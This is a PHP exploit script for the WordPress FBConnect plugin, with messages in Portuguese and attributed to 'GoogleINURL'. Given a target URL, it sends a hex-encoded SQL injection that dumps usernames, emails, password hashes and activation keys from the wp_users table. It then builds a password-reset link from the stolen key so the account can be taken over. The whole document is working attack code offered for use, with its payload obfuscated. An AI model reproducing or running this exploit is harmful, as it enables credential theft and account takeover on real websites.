EXPLOIT CMS WORDPRESS / FBCONNECT BY googleinurl

<?php

/*
  ###################################################################
  EXPLOIT CMS WORDPRESS / FBCONNECT
  By: GoogleINURL
  ref:http://pastebin.com/fQbmiGer
  ###################################################################
 */


error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

global $dados;

function msg($msg, $erro = NULL) {

    echo "<p><b>{$msg}</b></p>";
    (isset($erro)) ? exit() : NULL;
}

function montaUrlfinal($config, $dados) {
    $config['url'] = (isset($config['url'])) ? $config['url'] . hex2bin('2F77702D6C6F67696E2E7068703F616374696F6E3D7270266B65793D5B4B45595D266C6F67696E3D5B4E4F4D455F5553554152494F5D') : msg('FALHA!', 1);
    return str_replace(array('[NOME_USUARIO]','[KEY]'), $dados,$config['url']);
}

function eviarPacote($config, $op) {

   $exploit['1'] = hex2bin('2F3F6662636F6E6E6563745F616374696F6E3D6D79686F6D652666627573657269643D312B616E642B313D322B756E696F6E2B73656C6563742B312C322C332C342C352C636F6E6361742830783743374337432C757365725F6C6F67696E2C30783743374337432C757365725F656D61696C2C30783743374337432C757365725F61637469766174696F6E5F6B65792C30783743374337432C757365725F706173732C3078374337433743292C372C382C392C31302C31312C31322B66726F6D2B77705F75736572732D2D');
   $exploit['2'] = '/wp-login.php?action=lostpassword';
    switch ($op) {
        case '1':
            msg('PEGANDO INFOS user_login');
            $config['url'] = $config['url'] . $exploit['1'];
            break;
        case '2':
            msg('DIGITAR DADOS');
            $config['url'] = $config['url'] . $exploit['2'];
            break;
        default :
            msg('ERRO DE EXECUÇÃO', 1);
    }


    $c = curl_init();
    curl_setopt($c, CURLOPT_URL, $config['url']);
    curl_setopt($c, CURLOPT_USERAGENT ,"Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
    curl_setopt($c, CURLOPT_HEADER, 1);
    curl_setopt($c, CURLOPT_NOBODY, 0);
    curl_setopt($c, CURLOPT_COOKIEFILE,'cookie.txt');
    curl_setopt($c, CURLOPT_COOKIEJAR,'cookie.txt');
    curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($c, CURLOPT_FRESH_CONNECT, 1);
    curl_setopt($c, CURLOPT_VERBOSE, 1);

    $corpo = (curl_exec($c));

    if (isset($corpo)) {
        return count(explode('|||', $corpo) > 1) ? explode('|||', $corpo) : msg('FALHA!', 1);
    } else {
        return msg('FALHA NA EXECUÇÃO', 1);
    }
}

if (isset($_GET['url']) && !empty($_GET['url'])) {

    $config['url'] = $_GET['url'];
    $result = eviarPacote($config, 1);

    $dados['user'] = $result['1'];
    $dados['key'] = $result['3'];
    $url = montaUrlfinal($config,$dados);
    echo "<a href='{$url}' target='_black'>{$url}</a>";

    msg("USER:::: {$dados['user']}").msg("EMAIL:::: {$result['2']}").msg("SENHA:::: {$result['4']}").msg("USE_ACTIVATION_KEY:::: {$dados['key']}");
    echo "<iframe src='{$config['url']}/wp-login.php?action=lostpassword' width='900' height='900'>";

} else {
    print"Defina a url alvo.\r\n";
    unset($alvo);
    exit();
}
?>